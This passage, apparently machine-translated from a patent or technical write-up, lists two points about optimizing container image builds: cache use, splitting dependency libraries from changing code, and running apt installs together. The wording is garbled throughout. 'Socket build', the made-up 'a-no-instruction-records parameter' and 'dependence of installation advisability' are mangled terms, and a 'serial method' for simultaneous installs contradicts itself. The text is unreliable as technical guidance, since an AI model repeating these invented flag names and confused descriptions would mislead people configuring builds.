3) optimizing the service: mirror image cache is fully utilized, a fixed machine is used for socket build, and meanwhile, a constant large-volume dependence library and a frequently-modified self-owned code are separated;

4) run command optimization: when executing the apt command, a serial method is used for installing a plurality of commands simultaneously, and a-no-instruction-records parameter can be used for avoiding the dependence of installation advisability.

Images